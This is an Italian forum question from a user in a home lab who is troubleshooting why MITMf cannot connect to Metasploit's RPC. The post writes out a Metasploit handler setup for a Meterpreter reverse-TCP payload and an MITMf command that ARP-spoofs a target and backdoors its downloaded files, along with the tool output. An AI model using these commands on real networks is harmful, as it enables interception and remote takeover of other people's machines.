Sto tentando di iniettare un carico utile dannoso nella richiesta http. Possiedo un personal lamp server, una Kali VM e la maggior parte delle VM WindowsXP immaginabili. e tutto è sulla mia rete e legale. Ho seguito questo tutorial.
Ho eseguito metasploit con il seguente
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.4
set LPORT 8843
exploit -j
Durante la visione del video, Metasploit dice
[*] Starting the payload handler...
Da parte mia, inizia dicendo questo, poi mi riporta alla console. Strano, ma qualunque cosa io indovini.
Ora sto provando a eseguire mitmf in una finestra terminale diversa
sudo ./mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.244 --filepwn
Questo è il messaggio di errore che sto ricevendo da mitmf.
[*] MITMf v0.9.8 - 'The Dark Side'
|
|_ Net-Creds v1.0 online
|_ Spoof v0.6
| |_ ARP spoofing enabled
|_ FilePwn v0.3
| |_ BDFProxy v0.3.2 online
2018-07-17 02:23:27 [ARPpoisoner] Restoring connection 192.168.1.244 <-> 192.168.1.1 with 2 packets per host
[Msfrpc] Error connecting to Metasploit: HTTPConnectionPool(host='127.0.0.1', port=55552): Max retries exceeded with url: /api/ (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7fd9b7772290>: Failed to establish a new connection: [Errno 111] Connection refused',))
Ho fatto qualche ricerca su google e ho trovato questo thread.
Ho seguito le sue 2 istruzioni di istruzioni di comando e ho ricominciato l'intero processo senza fortuna. Ho anche provato a cambiare il LPORT in 55552 ma anche quello è fallito. Non sono un esperto di Metasploit quindi non inizierei nemmeno a sapere cosa cercare. Come posso risolvere ulteriormente questo problema?